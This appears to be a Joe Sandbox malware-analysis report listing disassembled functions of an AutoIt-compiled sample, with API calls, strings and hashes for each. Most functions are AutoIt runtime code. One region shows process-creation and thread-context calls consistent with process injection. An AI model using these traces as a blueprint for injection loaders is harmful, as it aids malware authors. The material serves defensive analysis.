Opcode Fuzzy Hash: 6f7f94feb84baf550f6d3cc2adcb26ea99c7d02fa372de7fb212b341da5eb9b5
Instruction Fuzzy Hash: A9718579904301AEC710EFA5E841ADBB7E8FFC6310B50492EF445972A0DBB2D549CB92

Function 00983A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00983A50
LoadCursorW.USER32(00000000,00007F00), ref: 00983A5F
LoadIconW.USER32(00000063), ref: 00983A76
LoadIconW.USER32(000000A4), ref: 00983A88
LoadIconW.USER32(000000A2), ref: 00983A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00983AC0
RegisterClassExW.USER32(?), ref: 00983B16

Part of subcall function 00983041: GetSysColorBrush.USER32(0000000F), ref: 00983074
Part of subcall function 00983041: RegisterClassExW.USER32(00000030), ref: 0098309E
Part of subcall function 00983041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
Part of subcall function 00983041: InitCommonControlsEx.COMCTL32(?), ref: 009830CC
Part of subcall function 00983041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
Part of subcall function 00983041: LoadIconW.USER32(000000A9), ref: 009830F2
Part of subcall function 00983041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101

Strings

#, xrefs: 00983AFB
AutoIt v3, xrefs: 00983B05
0, xrefs: 00983AF4

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d64f70a71f36dc2294f9ca50129ac833a9e19d996f977d6f14a0310dc37e22f7
Instruction ID: 1a3e7d52254374366d834e5c62051065350d2b63160fff9432ffb41a7e704d6e
Opcode Fuzzy Hash: d64f70a71f36dc2294f9ca50129ac833a9e19d996f977d6f14a0310dc37e22f7
Instruction Fuzzy Hash: 95214BB8D00708EFEB11DFF4EC09B9D7BB4FB4A711F00412AE500A62A2D3B656428F85

Function 00983633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 009836D2
KillTimer.USER32(?,00000001), ref: 009836FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0098371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0098372A
CreatePopupMenu.USER32 ref: 0098373E
PostQuitMessage.USER32(00000000), ref: 0098374D

Strings

TaskbarCreated, xrefs: 00983725

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c22e3645b84db9bceb70246a408e126452b3621aac11df35e978cef95be00be0
Instruction ID: 2bea12679bd4f9f69483be5bb94a5f3dd8ccbca035275ca515438c31a36741a5
Opcode Fuzzy Hash: c22e3645b84db9bceb70246a408e126452b3621aac11df35e978cef95be00be0
Instruction Fuzzy Hash: 16415BB9500509BBDF24BFBCDC0ABBD375CEB81700F104925F502963A2EAA6DD429762

Function 00983766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 009837AE
/AutoIt3OutputDebug, xrefs: 00983892
/AutoIt3ExecuteLine, xrefs: 009838A7
CMDLINE, xrefs: 00983822
/ErrorStdOut, xrefs: 0098387D
CMDLINERAW, xrefs: 009837FB
/AutoIt3ExecuteScript, xrefs: 009838BC

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 00fa55baff36b857eb765d8b35f9a136f7b60c0c52363b3170697b4cd9e6a574
Instruction ID: 3ab42d32f36bc2e9a863a40add250f0db3ddc500029471ea5fee000018ab9d1e
Opcode Fuzzy Hash: 00fa55baff36b857eb765d8b35f9a136f7b60c0c52363b3170697b4cd9e6a574
Instruction Fuzzy Hash: A0A15E7690021D9BCB14FBA4DC51AEEB778BF95710F44442AE415B7292EF749A08CBA0

Function 013FD0C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013FD191
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013FD3B7

Memory Dump Source

Source File: 00000000.00000002.1288653675.00000000013FA000.00000040.00000020.00020000.00000000.sdmp, Offset: 013FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13fa000_6SN0DJ38zZ.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction ID: 4228f2c8898f1978f401ecfcaf7ba8b823e2f70b0e6c8510f81c9d5a222a76eb
Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction Fuzzy Hash: 8BA10774E00209EBDB14CFE4C998BEEBBB5FF48308F208559E601AB281D7759A41CB94

Function 009839D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00983A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983A24
ShowWindow.USER32(00000000,?,?), ref: 00983A38
ShowWindow.USER32(00000000,?,?), ref: 00983A41

Strings

AutoIt v3, xrefs: 009839FB, 00983A00, 00983A01
edit, xrefs: 00983A1E

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: c7b65cf16f3c7f613b2a91a1ca34bbc6dd0fdddc9952165d83fcd9f6e69def2e
Instruction ID: a72c38e34deac92a7a221df717a54191c91d8ca28b07bad4e7e5b71e7b632c7d
Opcode Fuzzy Hash: c7b65cf16f3c7f613b2a91a1ca34bbc6dd0fdddc9952165d83fcd9f6e69def2e
Instruction Fuzzy Hash: E4F030789402947FEA3197A76C08EA73E7DE7C7F50B00002AB900B21B1C1E24C02CA70

Function 013FCE30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 163
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013FCD20: Sleep.KERNELBASE(000001F4), ref: 013FCD31

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013FCFA4

Strings

0K2OZ2E0DVE6PZDZWT0AG, xrefs: 013FD00D, 013FD010

Memory Dump Source

Source File: 00000000.00000002.1288653675.00000000013FA000.00000040.00000020.00020000.00000000.sdmp, Offset: 013FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13fa000_6SN0DJ38zZ.jbxd

Similarity

API ID: CreateFileSleep
String ID: 0K2OZ2E0DVE6PZDZWT0AG
API String ID: 2694422964-3884173165
Opcode ID: aeb968c9d28efe42d02b997f6b666ddfd1e75ee0246d1a21a5bf2f6277fa2abd
Instruction ID: 4aaadb61f3c2fede7db27c61a7f1aaebfd115bded71556aaf467068654b20025
Opcode Fuzzy Hash: aeb968c9d28efe42d02b997f6b666ddfd1e75ee0246d1a21a5bf2f6277fa2abd
Instruction Fuzzy Hash: DA618170D0424DDAEF11DBE4C854BEFBB75AF19704F004199E208BB2C0D7BA5A45CBA6

Function 0098407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009BD3D7

Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06

_memset.LIBCMT ref: 009840FC
_wcscpy.LIBCMT ref: 00984150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00984160

Strings

Line: , xrefs: 009BD400

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 5d8eb15c595da3c684893a9b7d17c0843f472aa4a5a3a3ad2253935837b9dd66
Instruction ID: 3d9897d6e32a22f5824d3a7fab5c9b4e1280d46912aeaf1a3709def3850f3dc9
Opcode Fuzzy Hash: 5d8eb15c595da3c684893a9b7d17c0843f472aa4a5a3a3ad2253935837b9dd66
Instruction Fuzzy Hash: 7931D075408305AFD321FBA0DC45FDBB7DCAF84304F20491AF585962A2EBB4D649CB92

Function 0098686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00984DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984E0F

_free.LIBCMT ref: 009BE263
_free.LIBCMT ref: 009BE2AA

Part of subcall function 00986A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00986BAD

Strings

Bad directive syntax error, xrefs: 009BE292
>>>AUTOIT SCRIPT<<<, xrefs: 009BE039

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 1dddd3569b7e6694ddda5cdfd8b69f9cd44fd44c073725cbe3ef35511a1149db
Instruction ID: 244213f66877e0f2ac1aa8ab9dd568760dfcf36c01849f1cda8b2b0db483a78c
Opcode Fuzzy Hash: 1dddd3569b7e6694ddda5cdfd8b69f9cd44fd44c073725cbe3ef35511a1149db
Instruction Fuzzy Hash: DF917071904219AFCF14EFA4CC91AEDB7B8FF59320F10442AF815AB2A1DB74AD05CB50

Function 009835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009835A1,SwapMouseButtons,00000004,?), ref: 009835D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009835A1,SwapMouseButtons,00000004,?,?,?,?,00982754), ref: 009835F5
RegCloseKey.KERNELBASE(00000000,?,?,009835A1,SwapMouseButtons,00000004,?,?,?,?,00982754), ref: 00983617

Strings

Control Panel\Mouse, xrefs: 009835D2

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: cc4bc8c193af456e6db1a38d2a9e24b234382e7eb8fa9d1cd0d5b3e07a75e274
Instruction ID: 07ff0d10f017a8730f2d581b7c48ed035a49bc7e215d34e7fa71c65562b48e52
Opcode Fuzzy Hash: cc4bc8c193af456e6db1a38d2a9e24b234382e7eb8fa9d1cd0d5b3e07a75e274
Instruction Fuzzy Hash: 6D114571610208BFDB20DFA9DC81AAEBBBCEF04B40F008469E805E7310E2719E419BA0

Function 013FBD20 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 013FC4DB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013FC571
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013FC593

Memory Dump Source

Source File: 00000000.00000002.1288653675.00000000013FA000.00000040.00000020.00020000.00000000.sdmp, Offset: 013FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13fa000_6SN0DJ38zZ.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
Instruction ID: 5032e538e788c144c628e46ef0411a497161aab368a552b11b2a6afceb098f31
Opcode Fuzzy Hash: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
Instruction Fuzzy Hash: 50620A30A14258DBEB24CFA4C854BDEB776FF58304F1091A9D20DEB290E7799E81CB59

Function 009E955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00984EE5: _fseek.LIBCMT ref: 00984EFD

Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9824
Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9837

_free.LIBCMT ref: 009E96A2
_free.LIBCMT ref: 009E96A9
_free.LIBCMT ref: 009E9714

Part of subcall function 009A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,009A9A24), ref: 009A2D69
Part of subcall function 009A2D55: GetLastError.KERNEL32(00000000,?,009A9A24), ref: 009A2D7B

_free.LIBCMT ref: 009E971C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: d198c7f6d40704a95c4bdc52b11a70cd6a2a3195aede0cfea8f7679ded30d905
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 90513DB1904259ABDF259F65CC81B9EBBB9EF88300F10449EB609A3351DB715E80CF58

Function 009A470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009A47A0
__flush.LIBCMT ref: 009A47C0
__write.LIBCMT ref: 009A47F3
__flsbuf.LIBCMT ref: 009A4821

Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 564a8c1fa5f1b38cb3b79764eae786509aa8162c9c80a8a47023f1c055c6c061
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: B241D475A007869BDB18CE69D8809AE77A9EFC3360B24853DE815C7680EBB4DD418BC0

Function 009844A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009844CF

Part of subcall function 0098407C: _memset.LIBCMT ref: 009840FC
Part of subcall function 0098407C: _wcscpy.LIBCMT ref: 00984150
Part of subcall function 0098407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00984160

KillTimer.USER32(?,00000001,?,?), ref: 00984524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00984533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009BD4B9

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: e79cff16e2bbb0c393a46f15894c0dc9824a1b35fdfd09017c2b4ee1e7e9c21c
Instruction ID: 5470338bc77d64526a99fceb7f377ec6be73a91a6e961d5001780b0f027ac214
Opcode Fuzzy Hash: e79cff16e2bbb0c393a46f15894c0dc9824a1b35fdfd09017c2b4ee1e7e9c21c
Instruction Fuzzy Hash: 122137748043889FE732DB248885BEBBBECAF02318F04048EF69E57282D3742985CB41

Function 00987285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009BEA39
GetOpenFileNameW.COMDLG32(?), ref: 009BEA83

Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770

Part of subcall function 009A0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A07B0

Strings

X, xrefs: 009BEA51

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 17b4f2da3c0747dfef9d0d47560764472b798870472a2aa858c5ebe3466552f9
Instruction ID: 7b4e4cb2b5b09576de98fba4514cec4ef338fe8301571009feb4ce49e9b3e5e1
Opcode Fuzzy Hash: 17b4f2da3c0747dfef9d0d47560764472b798870472a2aa858c5ebe3466552f9
Instruction Fuzzy Hash: 69219671A002489BDB51EFD4D845BEEBBFDAF89714F104059F408AB341DBB859498F91

Function 009E98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 009E98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009E990F

Strings

aut, xrefs: 009E9909

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: fd2d24b9b44063c88243738493a3042dbfb0b7e775d50b5922789517ff103ed9
Instruction ID: 8b37d90921475dd3b5190a14b8c0f7e368cd93d3a6caf43443f6f34d365c64c8
Opcode Fuzzy Hash: fd2d24b9b44063c88243738493a3042dbfb0b7e775d50b5922789517ff103ed9
Instruction Fuzzy Hash: A8D05B7554030D7FDB60DBD0DC0DFD6773CE704700F0006B1BA5491091D97055568B91

Function 009FCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95251a783e24e1dc923a972e5166cdddc489d73e598a0315b77301db69ab47ff
Instruction ID: 81e3caa72b6ab3c5d660de588c6684caedadd04f51610bf6370ae9c65f462d28
Opcode Fuzzy Hash: 95251a783e24e1dc923a972e5166cdddc489d73e598a0315b77301db69ab47ff
Instruction Fuzzy Hash: 28F126B06083099FC714DF28C580A6ABBE5FF89314F54892EF9999B391D731E945CF82

Function 0098F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 009A0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A0193
Part of subcall function 009A0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 009A019B
Part of subcall function 009A0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A01A6
Part of subcall function 009A0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A01B1
Part of subcall function 009A0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009A01B9
Part of subcall function 009A0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009A01C1

Part of subcall function 009960F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0098F930), ref: 00996154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0098F9CD
OleInitialize.OLE32(00000000), ref: 0098FA4A
CloseHandle.KERNEL32(00000000), ref: 009C45C8

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

